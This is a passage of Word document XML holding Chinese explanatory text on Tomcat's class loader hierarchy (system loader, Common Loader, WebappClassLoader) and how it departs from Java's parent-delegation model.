          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中的系统类加载器。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用，他也是在最初系统提供的几层类加载器环境下运行起来的。那么</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的一些最基本的类，也和其它简单</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用一样，是通过系统的类加载器来加载的，比如默认配置下的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tomcat/bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>目录下的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bootstrap.jar</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tomcat-juli.jar</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>commons-daemon.jar</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这几个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>包中的类。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F41887" w:rsidRPr="00F92975" w:rsidRDefault="00F41887" w:rsidP="00C10394">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="375"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Common Loader</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Common Loader</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在系统类加载器之上建立起来的，其父</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>loader</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是系统类加载器</w:t>
      </w:r>
      <w:r w:rsidR="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00F92975" w:rsidRPr="00D17ED1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AppClassLoader</w:t>
      </w:r>
      <w:r w:rsidR="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Common Loader</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>负责上面几个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>包外的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的大部分</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类，通常情况下是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tomcat/lib</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下的所有</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>包。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F41887" w:rsidRPr="00F92975" w:rsidRDefault="00F41887" w:rsidP="00C10394">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="408" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Webapp Class Loader</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。这个类加载器可以说是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>种最重要的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Class Loader</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，它创造了各个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web app</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>空间。在实现上，它打破了系统默认规则，或者说是打破了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java.lang.ClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>逻辑中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>双亲委派</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>模式，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提供了一套自定义的类加载流程。默认情况下，对于一个未加载过的类，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>WebappClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会先让系统加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java.lang.Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本身的基础类，如果不是基础类则优先在当前</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Web app</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>范围内查找并加载，如果没加载到，再交给</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>common loader</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92975">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>走标准的双亲委派模式加载。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A84035" w:rsidRDefault="00A84035" w:rsidP="00C10394">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>看完了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类装载器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我们再来看看应用服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(Tomcat)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对类加载器的使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每个应用服务器都有一套自己的类加载器体系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>从而与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的类加载器区别开以达到自己与应用程序隔离的目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A84035" w:rsidRDefault="00A84035" w:rsidP="00C10394">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
